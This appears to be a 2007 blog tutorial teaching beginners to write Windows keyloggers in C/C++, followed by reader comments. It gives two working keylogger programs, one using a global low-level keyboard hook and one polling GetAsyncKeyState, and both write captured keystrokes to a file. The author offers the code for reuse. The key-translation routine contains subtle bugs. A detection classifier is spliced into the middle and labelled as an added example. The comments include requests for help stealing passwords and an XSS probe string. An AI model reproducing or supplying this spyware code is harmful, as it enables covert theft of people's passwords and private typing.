Keylogging fun for C/C++ Beginners

12Dec07

The examples below are for beginners in C/C++ with some basic knowledge of the Windows API.

1. Global hook

Hook: A hook is a point in the system message-handling mechanism where an application can install a subroutine to monitor the message traffic in the system and process certain types of messages before they reach the target window procedure.

Available hooks:

WH_CALLWNDPROC
WH_CALLWNDPROCRET
WH_CBT
WH_DEBUG
WH_FOREGROUNDIDLE
WH_GETMESSAGE
WH_JOURNALPLAYBACK
WH_JOURNALRECORD
WH_KEYBOARD
WH_KEYBOARD_LL
WH_MOUSE
WH_MOUSE_LL
WH_MSGFILTER
WH_SHELL
WH_SYSMSGFILTER

To install a hook you call this API-function:

HHOOK SetWindowsHookEx(
    int idHook,        // type of hook to install
    HOOKPROC lpfn,     // address of hook procedure
    HINSTANCE hMod,    // handle to application instance
    DWORD dwThreadId   // identity of thread to install hook for
);

– idHook

Specifies the type of hook procedure to be installed. We choose “WH_KEYBOARD_LL” (13).

– lpfn

The LowLevelKeyboardProc hook procedure is an application-defined or library-defined callback function used with the SetWindowsHookEx function. The system calls this function every time a new keyboard input event is about to be posted into a thread input queue. The keyboard input can come from the local keyboard driver or from calls to the keybd_event function. If the input comes from a call to keybd_event, the input was “injected”.

The HOOKPROC type defines a pointer to this callback function. LowLevelKeyboardProc is a placeholder for the application-defined or library-defined function name.

LRESULT CALLBACK LowLevelKeyboardProc(
    int nCode,       // hook code
    WPARAM wParam,   // message identifier
    LPARAM lParam    // pointer to structure with message data
);

– hMod

In this case, our instance handle.

– dwThreadId

Specifies the identifier of the thread with which the hook procedure is to be associated.
If this parameter is zero, the hook procedure is associated with all existing threads.

Now we know enough to create our first keylogger, using a global keyboard hook:

————————————————————————————————————————–


#include <stdio.h>
#include <windows.h>
#define FILENAME "keylog.txt"

void CheckKey(int key);

LRESULT CALLBACK KeyboardHook(
    int nCode,       // hook code
    WPARAM wParam,   // message identifier
    LPARAM lParam    // pointer to structure with message data
);

typedef struct tagKBDLLHOOKSTRUCT {
    DWORD vkCode;       // virtual key code
    DWORD scanCode;     // scan code
    DWORD flags;        // flags
    DWORD time;         // time stamp for this message
    DWORD dwExtraInfo;  // extra info from the driver or keybd_event
} KBDLLHOOKSTRUCT, FAR *LPKBDLLHOOKSTRUCT, *PKBDLLHOOKSTRUCT;

HHOOK hHook;

int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR lpCmdLine,
                     int nCmdShow )
{

    hHook = SetWindowsHookEx(13, KeyboardHook, hInstance , 0);
    while (GetMessage(NULL,NULL,0,0)) ; // NOP while not WM_QUIT
    return UnhookWindowsHookEx(hHook);
}

LRESULT CALLBACK KeyboardHook (int nCode, WPARAM wParam, LPARAM lParam )
{
    if (nCode == HC_ACTION)
        if (wParam == WM_SYSKEYDOWN || wParam == WM_KEYDOWN)
            CheckKey (((PKBDLLHOOKSTRUCT)lParam)->vkCode);
    return CallNextHookEx(hHook, nCode, wParam, lParam);
}

void CheckKey(int key)
{
    FILE *pfile = fopen(FILENAME,"a+");
    // translate virtual key code to ascii
    // and write it to file..
    fclose(pfile);
}

————————————————————————————————————————–

2. GetAsyncKeyState()

The GetAsyncKeyState function determines whether a key is up or down at the time the function is called, and whether the key was pressed after a previous call to GetAsyncKeyState.

SHORT GetAsyncKeyState(
    int vKey   // virtual-key code
);

– vKey

Specifies one of 256 possible virtual-key codes.

This is our second keylogger, now using GetAsyncKeyState() :

————————————————————————————————————————–

#include <stdio.h>
#include <windows.h>

#define FILENAME "keylog.txt"

void CheckKey(int key);

void main()
{
    while(1)
    {
        Sleep(10); // avoid 100% cpu usage

        for(int key=8; key<=190; key++)
            if (GetAsyncKeyState(key) == HC_ACTION)
                CheckKey(key);
    }
}

void CheckKey(int key)
{
    // ...
}

==========================================================================================================================

The CheckKey() function may look like :


void CheckKey(int key)
{
    FILE *pfile = fopen(FILENAME,"a+");

    if (key==8)
        fprintf(pfile,"%s","[del]");
    if (key==13)
        fprintf(pfile,"%s","\n");
    if (key==32)
        fprintf(pfile,"%s"," ");
    if (key==VK_CAPITAL)
        fprintf(pfile,"%s","[CAPS]");
    if (key==VK_TAB)
        fprintf(pfile,"%s","[TAB]");
    if (key==VK_SHIFT)
        fprintf(pfile,"%s","[SHIFT]");
    if (key==VK_CONTROL)
        fprintf(pfile,"%s","[CTRL]");
    if (key==VK_PAUSE)
        fprintf(pfile,"%s","[PAUSE]");
    if (key==VK_ESCAPE)
        fprintf(pfile,"%s","[ESC]");
    if (key==VK_END)
        fprintf(pfile,"%s","[END]");
    if (key==VK_HOME)
        fprintf(pfile,"%s","[HOME]");
    if (key==VK_LEFT)
        fprintf(pfile,"%s","[LEFT]");
    if (key==VK_UP)
        fprintf(pfile,"%s","[UP]");
    if (key==VK_RIGHT)
        fprintf(pfile,"%s","[RIGHT]");
    if (key==VK_DOWN)
        fprintf(pfile,"%s","[DOWN]");
    if (key==VK_SNAPSHOT)
        fprintf(pfile,"%s","[PRINT]");
    if (key==VK_NUMLOCK)
        fprintf(pfile,"%s","[NUM LOCK]");
    if (key==190 || key==110)
        fprintf(pfile,"%s",".");

    if (key >=96 && key <= 105)
    {
        key -= 48;
        fprintf(pfile,"%s",&key);
    }

    if (key >=48 && key <= 59)
        fprintf(pfile,"%s",&key);

    if (key !=VK_LBUTTON || key !=VK_RBUTTON)
    {
        if (key >=65 && key <=90)
        {
            if (GetKeyState(VK_CAPITAL))
                fprintf(pfile,"%s",&key);
            else
            {
                key = key +32;
                fprintf(pfile,"%s",&key);

            }
        }
    }

    fclose(pfile);
}

The virtual key code table -> google. Compiled with MS VC++ 6.0.

bugs:
sure.. let me know. 🙂
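
From the monitoring side, the two techniques described above each leave a distinct API-call pattern: a keyboard hook installed with dwThreadId 0, or one process sweeping GetAsyncKeyState across most of the key range. The following is an added example, not code from the original article; the trace format, the function names classify and build_sample, and the POLL_KEYS_MIN threshold are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>
/* Constructed trace format (an assumption, not a real tool's output):
 * "<pid> SetWindowsHookEx <idHook> <dwThreadId>" | "<pid> GetAsyncKeyState <vKey>" */
#define WH_KEYBOARD     2
#define WH_KEYBOARD_LL 13
#define POLL_KEYS_MIN  40  /* a few polled keys is normal (games); a sweep is not */
enum { F_GLOBAL_KBD_HOOK = 1, F_KEY_POLLING = 2 };
/* Return a bitmask of findings for `pid` in a newline-separated trace. */
int classify(const char *trace, int pid)
{
    unsigned char seen[256] = {0};
    int distinct = 0, flags = 0;
    for (const char *line = trace; line && *line; ) {
        int p, a, b;
        if (sscanf(line, "%d SetWindowsHookEx %d %d", &p, &a, &b) == 3) {
            /* dwThreadId == 0: the hook covers every thread */
            if (p == pid && b == 0 && (a == WH_KEYBOARD || a == WH_KEYBOARD_LL))
                flags |= F_GLOBAL_KBD_HOOK;
        } else if (sscanf(line, "%d GetAsyncKeyState %d", &p, &a) == 2) {
            if (p == pid && a >= 0 && a < 256 && !seen[a]) {
                seen[a] = 1;   /* count each virtual-key code once */
                if (++distinct >= POLL_KEYS_MIN) flags |= F_KEY_POLLING;
            }
        }
        if ((line = strchr(line, '\n'))) line++;
    }
    return flags;
}

/* Constructed sample: pid 100 hooks, pid 200 sweeps 8..190, pid 300 is benign. */
size_t build_sample(char *buf, size_t n)
{
    size_t off = (size_t)snprintf(buf, n, "100 SetWindowsHookEx 13 0\n"
                                          "300 SetWindowsHookEx 14 0\n");
    for (int k = 8; k <= 190 && off < n; k++)
        off += (size_t)snprintf(buf + off, n - off, "200 GetAsyncKeyState %d\n", k);
    for (const char *w = "WASD"; *w && off < n; w++)
        off += (size_t)snprintf(buf + off, n - off, "300 GetAsyncKeyState %d\n", *w);
    return off;
}

int main(void)
{
    static char t[8192];
    build_sample(t, sizeof t);
    for (int pid = 100; pid <= 300; pid += 100)
        printf("pid %d -> flags %d\n", pid, classify(t, pid));
}
```

Process 300 in the sample installs a mouse hook and polls only four keys, so it is left unflagged; the distinct-key threshold is what separates ordinary input handling from a sweep of the key range.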



33 Responses to “Keylogging fun for C/C++ Beginners”

  1. 1 M

    Good article, is the source code solution or project available to download.

    I’m using vs2003 or 2005.

    Ta.

  2. @M:
    Well, this is not a project. It’s just an article. you can use these codes. Tell me exactly what you are looking for?

  3. 3 roger

    Very good post… see also http://www.businesshackers.com for more posts on this subject…

  4. 4 paul

    i am looking for an program or script that can see passes of runescape because i am hacked and want my acc back…
    plz do you have or can u make something for me?
    maybe thx

    paul

  5. 5 bhanu

    plz tell me detail n complete prog

  6. 6 Tim

    Hi im looking for a way to change the key pressed in the queue (i.e. if the user presses an “a” key but it will display a “z” key instead) like a key conversion.

  7. pretty good although there are much easier ways to make some keyloggers. But one of my first keyloggers looked just like this one.

  8. 8 sumit

    hey guys i am a fresher and i want to know how to hack passwords,how to hack other comp’s dextop,how to get data from other comp.but here is a problem i dont know about ms dos , c, c++.can i do this .if yes then reply me i want to bocome a comp expert .Will u teach me.

  9. 9 sumit

    hey guys ,my name is sumit.i want to know about how to hack passwords,how to hack other comp’s dextop ,how to hack data from other comp but there is problem that i dont know about dos,c,c++.can i do this.if yes then reply me .i want to become a comp expert.will u please teach me?

  10. 10 anonymous

    sumit…… wow….. asking to be a hacker, and yet u obviously know nothing…. funny😛

  11. 11 aaa

    aaaalert(‘xss’)

  12. 12 Snake

    #8 no you can't be a hacker but you can be a script kiddie (EVERYONE HATES EM)
    To be a hacker you need GREAT knowledge about computer how they work, why they do like they do, “elit h4x00rzskillz” (Programming for a very longtime and are good at it (many languages)) etc.

    So for the moment you CAN NOT be a hacker.
    Start with c++ and BURN for it and maybe in time you can call yourself hacker.
    I know i CANT call me a hacker

  13. 13 Mich

    I don’t understand one fundamental thing: you install a hook function I (I think) you do this in why so you can avoid to continuously poll the device (keyboard, mouse,…)

    But then in the main method you make a polling anyway… is not a contradiction? Or I haven’t understood something?

    Thx

  14. 14 Vance

    Isn’t it easier to download a free trial, for example from keylogger.org and use it, than create a new keylogger???

  15. im with paul on this i got hacked on runescape so many times its unreal and i want to
    get payback can you help me?

  16. 16 Runescape Veteran

    @Paul:
    The best thing you can do for a runescape account is to start fresh.

    THIS TIME with a proper password (capital letters, numbers, symbols etc. and no dictionary words).

    THIS TIME on a secure computer with Zone Alarm and a proper anti-virus (you can use the free AVG).

    And by all means DO NOT play at an internet café or other security threatening place.

  17. @14 – Vance

    Yes, by all means it is easier – and probably better for a person like you.
    However, some of us like to be challenged.

    Great tutorial on hooks btw. I’ve made a keylogger with GetAsyncKeyState() before but I’ve been looking for a good intro to hooking.

  18. 18 mayank

    hey guys i am a fresher and i want to know how to hack passwords,how to hack other comp’s dextop,how to get data from other comp.but here is a problem i dont know about ms dos , c, c++.can i do this .if yes then reply me i want to bocome a comp expert .Will u teach me.

  19. 19 mayank

    hey guys i am a fresher and i want to know how to hack passwords,how to hack other comp’s dextop,how to get data from other comp..can i do this .if yes then reply me i want to bocome a comp expert .Will u teach me.

  20. 20 Bulanesckie

    Hi Guys I am new in c++ which book do you recommend for me as i want to start hacking

    bulanesckie

  21. 21 Moezzie

    Great tutorial mate.
    Is there a similar way to do this in a Unix environment?

  22. 22 1337

    mayank,

    if you weren’t such an idiot you would use a search engine and learn how to program. Running around on forums/newsgroups asking blatantly how to hax makes alot of people very suspicious…

    your a tard.

  23. wowwwwwwww thank u loooot for such a great and useful info
    you’re info GURU😀
    GOOD LUCK to you
